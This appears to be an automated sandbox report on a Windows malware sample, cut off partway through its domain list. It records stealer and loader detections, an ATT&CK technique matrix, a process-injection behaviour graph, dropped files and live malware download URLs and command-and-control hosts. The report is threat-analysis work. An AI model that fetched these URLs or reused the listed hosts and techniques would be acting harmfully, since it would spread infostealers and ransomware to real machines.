                      Source: Yara matchFile source: 30.2.3BC6.exe.3aaf910.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 45.0.3BC6.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 45.0.3BC6.exe.400000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 45.0.3BC6.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.3BC6.exe.3aaf910.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 45.0.3BC6.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 45.2.3BC6.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 45.0.3BC6.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000002D.00000000.408848131.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.407524125.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.412827478.0000000003991000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.408441992.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.429951321.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.408078077.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 19.1.vfgiwcs.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.1.OG9rNsihJ7.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.vfgiwcs.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.OG9rNsihJ7.exe.5f15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.OG9rNsihJ7.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.BFBD.exe.6c15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.1.BFBD.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.vfgiwcs.6415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.BFBD.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.366966979.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.279897390.0000000003031000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.349879535.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.298084613.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.349992094.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.366989519.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.298215878.0000000001FA1000.00000004.00020000.sdmp, type: MEMORY
                      Yara detected Vidar stealerShow sources
                      Source: Yara matchFile source: 0000001C.00000002.357825450.000000000083A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.357794608.000000000081A000.00000004.00000020.sdmp, type: MEMORY
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 42.2.xqfkdfcl.exe.840000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.2.xqfkdfcl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 44.2.svchost.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.3136.exe.6c0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.3.3136.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.2.xqfkdfcl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.2.xqfkdfcl.exe.680e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.3.xqfkdfcl.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 44.2.svchost.exe.7b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.2.xqfkdfcl.exe.840000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.3136.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.3136.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000002.380383276.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000003.388526176.00000000007F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.524985253.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.362218485.00000000007F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.391463142.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.391805380.0000000000680000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.380671348.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.391938773.0000000000840000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 3136.exe PID: 5060, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: xqfkdfcl.exe PID: 5432, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3440, type: MEMORYSTR
                      Source: Yara matchFile source: 0000001C.00000002.357825450.000000000083A000.00000004.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 30.2.3BC6.exe.3aaf910.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 45.0.3BC6.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 45.0.3BC6.exe.400000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 45.0.3BC6.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.3BC6.exe.3aaf910.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 45.0.3BC6.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 45.2.3BC6.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 45.0.3BC6.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000002D.00000000.408848131.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.407524125.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.412827478.0000000003991000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.408441992.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.429951321.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.408078077.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 19.1.vfgiwcs.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.1.OG9rNsihJ7.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.vfgiwcs.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.OG9rNsihJ7.exe.5f15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.OG9rNsihJ7.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.BFBD.exe.6c15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.1.BFBD.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.vfgiwcs.6415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.BFBD.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.366966979.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.279897390.0000000003031000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.349879535.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.298084613.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.349992094.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.366989519.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.298215878.0000000001FA1000.00000004.00020000.sdmp, type: MEMORY
                      Yara detected Vidar stealerShow sources
                      Source: Yara matchFile source: 0000001C.00000002.357825450.000000000083A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.357794608.000000000081A000.00000004.00000020.sdmp, type: MEMORY
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 42.2.xqfkdfcl.exe.840000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.2.xqfkdfcl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 44.2.svchost.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.3136.exe.6c0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.3.3136.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.2.xqfkdfcl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.2.xqfkdfcl.exe.680e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.3.xqfkdfcl.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 44.2.svchost.exe.7b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.2.xqfkdfcl.exe.840000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.3136.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.3136.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000002.380383276.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000003.388526176.00000000007F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.524985253.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.362218485.00000000007F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.391463142.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.391805380.0000000000680000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.380671348.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.391938773.0000000000840000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 3136.exe PID: 5060, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: xqfkdfcl.exe PID: 5432, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3440, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1Windows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools311Input Capture1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumWeb Service11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API531Valid Accounts1Valid Accounts1Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsExploitation for Client Execution1Windows Service14Access Token Manipulation1Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationEncrypted Channel22Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsCommand and Scripting Interpreter3Logon Script (Mac)Windows Service14Software Packing43NTDSSystem Information Discovery237Distributed Component Object ModelInput CaptureScheduled TransferNon-Standard Port1SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsService Execution3Network Logon ScriptProcess Injection713Timestomp1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol4Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery581VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol35Jamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading131Proc FilesystemVirtualization/Sandbox Evasion241Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Valid Accounts1/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronVirtualization/Sandbox Evasion241Input CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdProcess Injection713KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                      Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskHidden Files and Directories1GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 553412 Sample: OG9rNsihJ7.exe Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 89 transfer.sh 2->89 91 raw.githubusercontent.com 2->91 93 8 other IPs or domains 2->93 117 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->117 119 Antivirus detection for URL or domain 2->119 121 Antivirus detection for dropped file 2->121 123 19 other signatures 2->123 11 OG9rNsihJ7.exe 2->11         started        14 xqfkdfcl.exe 2->14         started        16 vfgiwcs 2->16         started        18 10 other processes 2->18 signatures3 process4 dnsIp5 163 Contains functionality to inject code into remote processes 11->163 165 Injects a PE file into a foreign processes 11->165 21 OG9rNsihJ7.exe 11->21         started        167 Detected unpacking (changes PE section rights) 14->167 169 Detected unpacking (overwrites its own PE header) 14->169 171 Writes to foreign memory regions 14->171 173 Allocates memory in foreign processes 14->173 24 svchost.exe 14->24         started        175 Machine Learning detection for dropped file 16->175 27 vfgiwcs 16->27         started        95 127.0.0.1 unknown unknown 18->95 177 Changes security center settings (notifications, updates, antivirus, firewall) 18->177 29 WerFault.exe 18->29         started        signatures6 process7 dnsIp8 145 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 21->145 147 Maps a DLL or memory area into another process 21->147 149 Checks if the current machine is a virtual machine (disk enumeration) 21->149 31 explorer.exe 12 21->31 injected 97 microsoft-com.mail.protection.outlook.com 40.93.207.0, 25, 49821 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 24->97 99 patmushta.info 94.142.143.116, 443, 49823 IHOR-ASRU Russian Federation 24->99 151 System process connects to network (likely due to code injection or exploit) 24->151 153 Creates a thread in another existing process (thread injection) 27->153 signatures9 process10 dnsIp11 103 host-data-coin-11.com 31->103 105 185.233.81.115, 443, 49785 SUPERSERVERSDATACENTERRU Russian Federation 31->105 107 11 other IPs or domains 31->107 77 C:\Users\user\AppData\Roaming\vfgiwcs, PE32 31->77 dropped 79 C:\Users\user\AppData\Local\Temp\FC2A.exe, PE32 31->79 dropped 81 C:\Users\user\AppData\Local\Temp\BFBD.exe, PE32 31->81 dropped 83 15 other malicious files 31->83 dropped 109 System process connects to network (likely due to code injection or exploit) 31->109 111 Benign windows process drops PE files 31->111 113 Deletes itself after installation 31->113 115 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->115 36 254E.exe 31->36         started        39 3136.exe 2 31->39         started        42 BFBD.exe 31->42         started        44 2 other processes 31->44 file12 signatures13 process14 file15 125 Detected unpacking (changes PE section rights) 36->125 127 Detected unpacking (overwrites its own PE header) 36->127 129 Found evasive API chain (may stop execution after checking mutex) 36->129 143 4 other signatures 36->143 85 C:\Users\user\AppData\Local\...\xqfkdfcl.exe, PE32 39->85 dropped 131 Machine Learning detection for dropped file 39->131 133 Uses netsh to modify the Windows network and firewall settings 39->133 135 Modifies the windows firewall 39->135 46 cmd.exe 39->46         started        49 cmd.exe 39->49         started        51 sc.exe 39->51         started        63 3 other processes 39->63 53 BFBD.exe 42->53         started        56 svchost.exe 42->56         started        137 Antivirus detection for dropped file 44->137 139 Multi AV Scanner detection for dropped file 44->139 141 Injects a PE file into a foreign processes 44->141 58 WerFault.exe 23 9 44->58         started        61 3BC6.exe 44->61         started        signatures16 process17 dnsIp18 87 C:\Windows\SysWOW64\...\xqfkdfcl.exe (copy), PE32 46->87 dropped 65 conhost.exe 46->65         started        67 conhost.exe 49->67         started        69 conhost.exe 51->69         started        155 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 53->155 157 Maps a DLL or memory area into another process 53->157 159 Checks if the current machine is a virtual machine (disk enumeration) 53->159 161 Creates a thread in another existing process (thread injection) 53->161 101 192.168.2.1 unknown unknown 58->101 71 conhost.exe 63->71         started        73 conhost.exe 63->73         started        75 conhost.exe 63->75         started        file19 signatures20 process21

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      OG9rNsihJ7.exe49%ReversingLabsWin32.Trojan.Chapak
                      OG9rNsihJ7.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\3BC6.exe100%AviraHEUR/AGEN.1211353
                      C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe100%AviraTR/Crypt.XPACK.Gen
                      C:\Users\user\AppData\Local\Temp\2473.exe100%AviraHEUR/AGEN.1212012
                      C:\Users\user\AppData\Local\Temp\6AF7.exe100%AviraHEUR/AGEN.1212012
                      C:\Users\user\AppData\Local\Temp\3BC6.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\FC2A.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\vfgiwcs100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\9789.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\254E.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\45AA.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\B1B2.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\8017.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\2F32.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\54AF.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\BFBD.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\3136.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\88E2.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\7808.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\3A7E.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\3BC6.exe46%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\3BC6.exe89%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Local\Temp\45AA.exe34%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\45AA.exe77%ReversingLabsWin32.Ransomware.StopCrypt
                      C:\Users\user\AppData\Local\Temp\54AF.exe50%ReversingLabsWin32.Infostealer.Generic
                      C:\Users\user\AppData\Local\Temp\8017.exe35%ReversingLabsByteCode-MSIL.Trojan.Pwsx

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      30.0.3BC6.exe.650000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                      30.0.3BC6.exe.650000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                      20.0.B1B2.exe.2080e50.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      45.0.3BC6.exe.3c0000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                      1.1.OG9rNsihJ7.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.1.vfgiwcs.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      45.0.3BC6.exe.3c0000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                      28.2.254E.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.OG9rNsihJ7.exe.5f15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      28.3.254E.exe.7f0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      19.2.vfgiwcs.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      42.2.xqfkdfcl.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                      29.2.3136.exe.6c0e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      30.2.3BC6.exe.650000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      19.0.vfgiwcs.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      29.3.3136.exe.7f0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      20.0.B1B2.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      22.2.BFBD.exe.6c15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      45.0.3BC6.exe.3c0000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                      1.2.OG9rNsihJ7.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      45.0.3BC6.exe.3c0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      20.0.B1B2.exe.2080e50.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      45.0.3BC6.exe.400000.8.unpack100%AviraHEUR/AGEN.1145065Download File
                      1.0.OG9rNsihJ7.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      24.0.BFBD.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.0.OG9rNsihJ7.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      30.0.3BC6.exe.650000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                      19.0.vfgiwcs.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.0.OG9rNsihJ7.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      45.0.3BC6.exe.400000.7.unpack100%AviraHEUR/AGEN.1145065Download File
                      24.1.BFBD.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      20.0.B1B2.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      24.2.BFBD.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      24.0.BFBD.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      42.3.xqfkdfcl.exe.7f0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      19.0.vfgiwcs.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      44.2.svchost.exe.7b0000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                      45.2.3BC6.exe.400000.0.unpack100%AviraHEUR/AGEN.1145065Download File
                      45.0.3BC6.exe.400000.4.unpack100%AviraHEUR/AGEN.1145065Download File
                      20.2.B1B2.exe.2080e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      28.2.254E.exe.6c0e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      45.0.3BC6.exe.400000.5.unpack100%AviraHEUR/AGEN.1145065Download File
                      29.2.3136.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                      42.2.xqfkdfcl.exe.840000.2.unpack100%AviraBDS/Backdoor.GenDownload File
                      45.0.3BC6.exe.400000.6.unpack100%AviraHEUR/AGEN.1145065Download File
                      18.2.vfgiwcs.6415a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      24.0.BFBD.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      20.2.B1B2.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      42.2.xqfkdfcl.exe.680e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      20.3.B1B2.exe.2090000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      30.0.3BC6.exe.650000.0.unpack100%AviraHEUR/AGEN.1211353Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://81.163.30.181/l2.exe100%Avira URL Cloudmalware
                      http://185.7.214.171:8080/6.php100%URL Reputationmalware
                      http://host-data-coin-11.com/0%URL Reputationsafe
                      http://data-host-coin-8.com/files/6961_1642089187_2359.exe100%Avira URL Cloudmalware
                      http://data-host-coin-8.com/game.exe0%URL Reputationsafe
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      https://api.ip.sb/ip0%URL Reputationsafe
                      http://unicupload.top/install5.exe100%URL Reputationphishing
                      http://74.201.28.62/book/KB5009812.png0%Avira URL Cloudsafe
                      http://schemas.microsoft.0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      http://privacy-tools-for-you-780.com/downloads/toolspab3.exe100%Avira URL Cloudmalware
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      http://74.201.28.62/book/KB5009812.exe0%Avira URL Cloudsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      http://data-host-coin-8.com/files/7729_1642101604_1835.exe100%Avira URL Cloudmalware
                      http://data-host-coin-8.com/files/9030_1641816409_7037.exe100%Avira URL Cloudmalware
                      https://dynamic.t0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      http://81.163.30.181/l3.exe100%Avira URL Cloudmalware
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      github.com
                      		140.82.121.4
                      		truefalse
                        		high
                        patmushta.info
                        		94.142.143.116
                        		truefalse
                          		high
                          raw.githubusercontent.com
                          		185.199.108.133
                          		truefalse
                            		high
                            cdn.discordapp.com
                            		162.159.133.233
                            		truefalse
                              		high
                              ipwhois.app
                              		136.243.172.101
                              		truefalse
                                		high
                                unicupload.top
                                		54.38.220.85
                                		truefalse
                                  		high
                                  host-data-coin-11.com
                                  		8.209.70.0
                                  		truefalse
                                    		high
                                    c9d0e790b353537889bd47a364f5acff43c11f248.xyz
                                    		185.112.83.97
                                    		truefalse
                                      		high
                                      privacy-tools-for-you-780.com
                                      		8.209.70.0
                                      		truefalse
                                        		high
                                        microsoft-com.mail.protection.outlook.com
                                        		40.93.207.0
